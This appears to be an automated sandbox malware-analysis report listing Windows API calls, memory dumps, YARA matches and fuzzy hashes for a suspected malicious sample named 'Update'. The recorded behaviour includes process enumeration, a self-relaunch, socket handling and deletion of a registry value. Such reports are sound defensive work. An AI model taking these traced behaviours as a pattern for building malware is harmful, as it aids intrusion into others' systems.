                                                                                            • API String ID: 1019945655-0
                                                                                            • Opcode ID: 31d6292f814c0e31e6d340cf304f2be826e57a3b8993f3a962d64f90d82a46b5
                                                                                            • Instruction ID: d70eec7c9ab1f788b50f7e077478f793d7fb77ddcd461e4f21440b9d9c5d691e
                                                                                            • Opcode Fuzzy Hash: 31d6292f814c0e31e6d340cf304f2be826e57a3b8993f3a962d64f90d82a46b5
                                                                                            • Instruction Fuzzy Hash: 80F090362046055BC220FBAADC84C4BF3E9EFC8720B244B09E265873D4CA71E806CBA4
                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 034E3311
                                                                                            • Sleep.KERNEL32(00000258), ref: 034E331E
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 034E3326
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 034E3332
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 034E333A
                                                                                            • Sleep.KERNEL32(0000012C), ref: 034E334B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                                            • String ID:
                                                                                            • API String ID: 3137405945-0
                                                                                            • Opcode ID: 9a6d800252488c4db140617562de5740f46c41dd00b1d2d844987f4ef8592810
                                                                                            • Instruction ID: 4f09854cf10588e62c2248002966a9220a650541d795128f3fb878870baacbbd
                                                                                            • Opcode Fuzzy Hash: 9a6d800252488c4db140617562de5740f46c41dd00b1d2d844987f4ef8592810
                                                                                            • Instruction Fuzzy Hash: CFF082722043056BD610ABA9DC84D46F3E8AF99334F204B09F221832E4CAB1E806DB60
                                                                                            APIs
                                                                                            • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00021D85
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00021D92
                                                                                            • _CxxThrowException.VCRUNTIME140(?,000227B4), ref: 00021E99
                                                                                            • _CxxThrowException.VCRUNTIME140(?,00022808), ref: 00021EB6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3562466950.0000000000021000.00000020.00000001.01000000.00000005.sdmp, Offset: 00020000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3562433732.0000000000020000.00000002.00000001.01000000.00000005.sdmp
                                                                                             • Associated: 00000003.00000002.3562507849.0000000000022000.00000002.00000001.01000000.00000005.sdmp
                                                                                             • Associated: 00000003.00000002.3562539425.0000000000023000.00000004.00000001.01000000.00000005.sdmp
                                                                                             • Associated: 00000003.00000002.3562581470.0000000000024000.00000002.00000001.01000000.00000005.sdmp
                                                                                             • Associated: 00000003.00000002.3562581470.0000000000066000.00000002.00000001.01000000.00000005.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_20000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionThrow$_callnewhmalloc
                                                                                            • String ID: Unknown exception
                                                                                            • API String ID: 4113974480-410509341
                                                                                            • Opcode ID: 7216ff27f89032d51d37947722a498acd5c1f3340bbac43742d36af2aa278916
                                                                                            • Instruction ID: 34ea3eba9eef833c5ccff8e1da481786c30d4933ec5c305fe325c2b5421cf819
                                                                                            • Opcode Fuzzy Hash: 7216ff27f89032d51d37947722a498acd5c1f3340bbac43742d36af2aa278916
                                                                                            • Instruction Fuzzy Hash: 5CF0AF3490422DB6CF54BAE8FD069ED77AC5B30350BA08575F92896093EB71EA5AC5C0
                                                                                            APIs
                                                                                            • ___BuildCatchObject.LIBCMT ref: 0350096E
                                                                                              • Part of subcall function 035008C9: ___BuildCatchObjectHelper.LIBCMT ref: 035008FF
                                                                                            • _UnwindNestedFrames.LIBCMT ref: 03500985
                                                                                            • ___FrameUnwindToState.LIBCMT ref: 03500993
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                            • String ID: csm$csm
                                                                                            • API String ID: 2163707966-3733052814
                                                                                            • Opcode ID: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                            • Instruction ID: c00cbac5be0a93a90650f41ff8aabda4d2bd7cb779431a50a3f2b98a33a4ce2f
                                                                                            • Opcode Fuzzy Hash: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                            • Instruction Fuzzy Hash: DF01123500120ABFEF12AF51DC44EAABA7AFF48350F048414BD481A1B0D73299A1DBA0
                                                                                            APIs
                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,F1BBC535,?,?,00000000,6C3AC7DD,000000FF,?,6C3926D0,6C3925AA,?,6C39276C,00000000), ref: 6C392644
                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C392656
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,6C3AC7DD,000000FF,?,6C3926D0,6C3925AA,?,6C39276C,00000000), ref: 6C392678
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                            • API String ID: 4061214504-1276376045
                                                                                            • Opcode ID: 43510cf1881fe82618e8e1f80f94a9108046cee74d171ee1168fa16308754694
                                                                                            • Instruction ID: 67f17fe649bfdb05ffd6c418e1733173c33ce7624a28ee103b28b23745686e91
                                                                                            • Opcode Fuzzy Hash: 43510cf1881fe82618e8e1f80f94a9108046cee74d171ee1168fa16308754694
                                                                                            • Instruction Fuzzy Hash: 76013B31A14A59AFDF019F54CD09FAE7BBCFB15715F000925F821E2A90DB769904CE94
                                                                                            APIs
                                                                                            • PeekConsoleInputA.KERNEL32(?,gfff,6C3B9D70,00000000,?,6C393746,00000000,0000000C,6C3B9D70,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0B35
                                                                                            • GetLastError.KERNEL32(?,6C393746,00000000,0000000C,6C3B9D70,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0B41
                                                                                              • Part of subcall function 6C3A0C1D: CloseHandle.KERNEL32(FFFFFFFF,6C3A0B05,?,6C3936DC,0000000C,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0C2D
                                                                                            • ___initconin.LIBCMT ref: 6C3A0B51
                                                                                              • Part of subcall function 6C3A0BFE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,6C3A0A79,6C3936CB,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0C11
                                                                                            • PeekConsoleInputA.KERNEL32(?,?,FFFFFFFF,?,6C393746,00000000,0000000C,6C3B9D70,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0B65
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleInputPeek$CloseCreateErrorFileHandleLast___initconin
                                                                                            • String ID: gfff
                                                                                            • API String ID: 1545762386-1553575800
                                                                                            • Opcode ID: 19b0023bb04df08badad7ab1bfeb10fb9f871e601297209204f86accffbaba16
                                                                                            • Instruction ID: 9bb65a0d057bed5fc47842d2d64fbe9d5e432f3a06f224f9883053da5556f644
                                                                                            • Opcode Fuzzy Hash: 19b0023bb04df08badad7ab1bfeb10fb9f871e601297209204f86accffbaba16
                                                                                            • Instruction Fuzzy Hash: BEF0C936A0015DBBCF122FD9DC049DE3F7AFB5A3A9B044110FA1A96620CB32C8719F95
                                                                                            APIs
                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 034EB800
                                                                                            • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 034EB810
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 034EB81B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseDeleteOpenValue
                                                                                            • String ID: Console$IpDatespecial
                                                                                            • API String ID: 849931509-1840232981
                                                                                            • Opcode ID: 6dc2452220382a3fc7a358ab9a3c0b7b884f34dc5643d40cb0dc8752ca5395bd
                                                                                            • Instruction ID: f47dea1331959451ba52b511b1332ce4d5ac93f4a76214bad4564928a4791aef
                                                                                            • Opcode Fuzzy Hash: 6dc2452220382a3fc7a358ab9a3c0b7b884f34dc5643d40cb0dc8752ca5395bd
                                                                                            • Instruction Fuzzy Hash: CFE02632204300AFD320E660BD4FFA97354FB8C305F104D0DFA84A10818153E009DA65
                                                                                            APIs
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,DF800B7B), ref: 034EB9DA
                                                                                            • _memset.LIBCMT ref: 034EB9FB
                                                                                            • _memset.LIBCMT ref: 034EBA4B
                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 034EBA65
                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 034EBAB7
                                                                                              • Part of subcall function 034EF707: _malloc.LIBCMT ref: 034EF721
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process32_memset$CreateFirstNextSnapshotToolhelp32_malloc
                                                                                            • String ID:
                                                                                            • API String ID: 2416807333-0
                                                                                            • Opcode ID: ab230af0a97490279129c02ab6a526a6897e6d3cf1aaed7695c336d7a2a9b227
                                                                                            • Instruction ID: 752a2ada21eeb452a78bf54a40203b7e33100d0b1f7ef4bfcfbb1eac7a153598
                                                                                            • Opcode Fuzzy Hash: ab230af0a97490279129c02ab6a526a6897e6d3cf1aaed7695c336d7a2a9b227
                                                                                            • Instruction Fuzzy Hash: F3410631904205AFDB20DF60CC45FABB7B8FF04715F04469AE9159F2C0E7759A85CB99
                                                                                            APIs
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C374CD5
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C374CEF
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C374D10
                                                                                            • __Getctype.LIBCPMT ref: 6C374DC4
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C374DF7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                                            • String ID:
                                                                                            • API String ID: 3087743877-0
                                                                                            • Opcode ID: 8462968a0808042533ef2764203be9dd2016c5ca46cc45d199590f22395ed8d8
                                                                                            • Instruction ID: caaa69a3ecf948ad76f39d5026d761ac2fb6669b08676febb5b92fc102656c0f
                                                                                            • Opcode Fuzzy Hash: 8462968a0808042533ef2764203be9dd2016c5ca46cc45d199590f22395ed8d8
                                                                                            • Instruction Fuzzy Hash: BB416871E002148FCB20DF98C855BAEB7B4FF58718F044119D899ABB81E739A904CFA6
                                                                                            APIs
                                                                                            • recv.WS2_32(?,?,00000598,00000000), ref: 034E3CBF
                                                                                            • SetLastError.KERNEL32(00000000,?,?,034E399F,?,?,00000000,000000FF,00000000), ref: 034E3CFA
                                                                                            • GetLastError.KERNEL32(00000000), ref: 034E3D45
                                                                                            • WSAGetLastError.WS2_32(?,?,034E399F,?,?,00000000,000000FF,00000000), ref: 034E3D7B
                                                                                            • WSASetLastError.WS2_32(0000000D,?,?,034E399F,?,?,00000000,000000FF,00000000), ref: 034E3DA2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$recv
                                                                                            • String ID:
                                                                                            • API String ID: 316788870-0
                                                                                            • Opcode ID: d81e5fda064823cfc1cb5968aec99ffd516a123a79f8027b9ea220dd056f1a56
                                                                                            • Instruction ID: b63b8bb5ec6e5d8d66f2399373534cff5579c9caafb8b55cedc54c18edd809c8
                                                                                            • Opcode Fuzzy Hash: d81e5fda064823cfc1cb5968aec99ffd516a123a79f8027b9ea220dd056f1a56
                                                                                            • Instruction Fuzzy Hash: 6C31267A6042108FEB25DFA8D4C8F6A77A9FB84326F0405ABED05CF389C731D8418B59
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 0091404B
                                                                                              • Part of subcall function 009113F7: HeapFree.KERNEL32(?,00000000,?,?,?,00914088,?,00000000,00914010,?,10015054,0091361F), ref: 00911414
                                                                                            • HeapDestroy.KERNEL32(?,?,00000000,00914010,?,10015054,0091361F), ref: 00914090
                                                                                            • HeapCreate.KERNEL32(?,?,?,?,00000000,00914010,?,10015054,0091361F), ref: 009140AB
                                                                                            • SetEvent.KERNEL32(?,?,00000000,00914010,?,10015054,0091361F), ref: 00914127
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0091412E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$CriticalSection$CreateDestroyEnterEventFreeLeave
                                                                                            • String ID:
                                                                                            • API String ID: 563679510-0
                                                                                            • Opcode ID: a47338e344b9415d0666abf4aacaa3da54f4cea86e3874ea6b078b9e747c069c
                                                                                            • Instruction ID: b884c91cc7d2bd268608bb8b552b383a26f029cc3934c20f773ed5c2c31de06d
                                                                                            • Opcode Fuzzy Hash: a47338e344b9415d0666abf4aacaa3da54f4cea86e3874ea6b078b9e747c069c
                                                                                            • Instruction Fuzzy Hash: DA310270600A06EFD705DB74C888BAAF7A8FF4C311F148659E5298B660CB35E895CBD0
                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 034F0EF9
                                                                                              • Part of subcall function 034EF673: __FF_MSGBANNER.LIBCMT ref: 034EF68C
                                                                                              • Part of subcall function 034EF673: __NMSG_WRITE.LIBCMT ref: 034EF693
                                                                                              • Part of subcall function 034EF673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76), ref: 034EF6B8
                                                                                            • _free.LIBCMT ref: 034F0F0C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap_free_malloc
                                                                                            • String ID:
                                                                                            • API String ID: 1020059152-0
                                                                                            • Opcode ID: f10a3e81bcaee892d9d54f1479343612492f7549086195fe017301255bb52164
                                                                                            • Instruction ID: 163d9b3889797a91ed5dd1ba822ed2162136f4965b8e05a44594348a76d5df11
                                                                                            • Opcode Fuzzy Hash: f10a3e81bcaee892d9d54f1479343612492f7549086195fe017301255bb52164
                                                                                            • Instruction Fuzzy Hash: C4115736408715AFCB21BF72E804A1B37499F802A0F1E002BEA498F261DB7184428BBC
                                                                                            APIs
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 034E2C3F
                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 034E2C55
                                                                                            • TranslateMessage.USER32(?), ref: 034E2C64
                                                                                            • DispatchMessageW.USER32(?), ref: 034E2C6A
                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 034E2C78
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                            • String ID:
                                                                                            • API String ID: 2015114452-0
                                                                                            • Opcode ID: 0c61072903bddebe2b6a5f4cf220262610d2893d734d645547c781821ccbc34d
                                                                                            • Instruction ID: 9b4035b168ce22e164944a15e977572b75923a999a8b98f88e60da4f813ebe7e
                                                                                            • Opcode Fuzzy Hash: 0c61072903bddebe2b6a5f4cf220262610d2893d734d645547c781821ccbc34d
                                                                                            • Instruction Fuzzy Hash: 3801DB3265031EB6EA20F6D4DC85FBB736CAB04B11F104D52F710EE1C4D6E2A40687A8
                                                                                            APIs
                                                                                            • __CreateFrameInfo.LIBCMT ref: 009236A2
                                                                                              • Part of subcall function 00923232: __getptd.LIBCMT ref: 00923240
                                                                                              • Part of subcall function 00923232: __getptd.LIBCMT ref: 0092324E
                                                                                            • __getptd.LIBCMT ref: 009236AC
                                                                                              • Part of subcall function 009198E6: __getptd_noexit.LIBCMT ref: 009198E9
                                                                                              • Part of subcall function 009198E6: __amsg_exit.LIBCMT ref: 009198F6
                                                                                            • __getptd.LIBCMT ref: 009236BA
                                                                                            • __getptd.LIBCMT ref: 009236C8
                                                                                            • __getptd.LIBCMT ref: 009236D3
                                                                                              • Part of subcall function 009232D7: __CallSettingFrame@12.LIBCMT ref: 00923323
                                                                                              • Part of subcall function 009237A0: __getptd.LIBCMT ref: 009237AF
                                                                                              • Part of subcall function 009237A0: __getptd.LIBCMT ref: 009237BD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                            • String ID:
                                                                                            • API String ID: 3282538202-0
                                                                                            • Opcode ID: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
                                                                                            • Instruction ID: abbfda4f9bf27a2b338d4df493d5aef3252042e5cb0fd739bee6817ff787036d
                                                                                            • Opcode Fuzzy Hash: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
                                                                                            • Instruction Fuzzy Hash: A211B2B5D00209DFDB00EFA4D956BEE7BB0FF48314F1084A9F814AB251EB389A559F50
                                                                                            APIs
                                                                                            • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 034E4B83
                                                                                            • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 034E4B8D
                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 034E4BA0
                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 034E4BA3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                            • String ID:
                                                                                            • API String ID: 3168844106-0
APIs
• GetModuleHandleW.KERNEL32(10015EB4,10017C00,00000008,009198C1,00000000,00000000,?,0000FFFF,009170E9,0091BB26), ref: 009197CA
• __lock.LIBCMT ref: 009197FE
  • Part of subcall function 0091C11B: __amsg_exit.LIBCMT ref: 0091C13D
  • Part of subcall function 0091C11B: RtlEnterCriticalSection.NTDLL(00000001), ref: 0091C145
• InterlockedIncrement.KERNEL32(?), ref: 0091980B
• __lock.LIBCMT ref: 0091981F
• ___addlocaleref.LIBCMT ref: 0091983D
Memory Dump Source
• Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_910000_Update.jbxd
Similarity
• API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit
• String ID:
• API String ID: 3732598078-0
APIs
• setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 00912D13
• CancelIo.KERNEL32(?), ref: 00912D1D
• InterlockedExchange.KERNEL32(00000000,00000000), ref: 00912D26
• closesocket.WS2_32(?), ref: 00912D30
• SetEvent.KERNEL32(00000001), ref: 00912D3A
Memory Dump Source
• Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_910000_Update.jbxd
Similarity
• API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
• String ID:
• API String ID: 1486965892-0
APIs
• setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 034E2D5C
• CancelIo.KERNEL32(?), ref: 034E2D66
• InterlockedExchange.KERNEL32(00000000,00000000), ref: 034E2D6F
• closesocket.WS2_32(?), ref: 034E2D79
• SetEvent.KERNEL32(00000001), ref: 034E2D83
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
• String ID:
• API String ID: 1486965892-0
APIs
• __getptd.LIBCMT ref: 0091E122
  • Part of subcall function 009198E6: __getptd_noexit.LIBCMT ref: 009198E9
  • Part of subcall function 009198E6: __amsg_exit.LIBCMT ref: 009198F6
• __getptd.LIBCMT ref: 0091E139
• __amsg_exit.LIBCMT ref: 0091E147
• __lock.LIBCMT ref: 0091E157
• __updatetlocinfoEx_nolock.LIBCMT ref: 0091E16B
Memory Dump Source
• Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_910000_Update.jbxd
Similarity
• API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
• String ID:
• API String ID: 938513278-0
APIs
• __getptd.LIBCMT ref: 034F5012
  • Part of subcall function 034F3E5B: __getptd_noexit.LIBCMT ref: 034F3E5E
  • Part of subcall function 034F3E5B: __amsg_exit.LIBCMT ref: 034F3E6B
• __getptd.LIBCMT ref: 034F5029
• __amsg_exit.LIBCMT ref: 034F5037
• __lock.LIBCMT ref: 034F5047
• __updatetlocinfoEx_nolock.LIBCMT ref: 034F505B
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
• String ID:
• API String ID: 938513278-0
APIs
• __getptd.LIBCMT ref: 030549D1
  • Part of subcall function 0305381A: __getptd_noexit.LIBCMT ref: 0305381D
  • Part of subcall function 0305381A: __amsg_exit.LIBCMT ref: 0305382A
• __getptd.LIBCMT ref: 030549E8
• __amsg_exit.LIBCMT ref: 030549F6
• __lock.LIBCMT ref: 03054A06
• __updatetlocinfoEx_nolock.LIBCMT ref: 03054A1A
Memory Dump Source
• Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_3040000_Update.jbxd
Yara matches
Similarity
• API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
• String ID:
• API String ID: 938513278-0
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 034EC932
• GetCommandLineW.KERNEL32 ref: 034EC938
• GetStartupInfoW.KERNEL32(?), ref: 034EC947
• CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 034EC96F
• ExitProcess.KERNEL32 ref: 034EC977
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
• String ID:
• API String ID: 3421218197-0
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 034E75D2
• GetCommandLineW.KERNEL32 ref: 034E75D8
• GetStartupInfoW.KERNEL32(?), ref: 034E75E7
• CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 034E760F
• ExitProcess.KERNEL32 ref: 034E7617
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
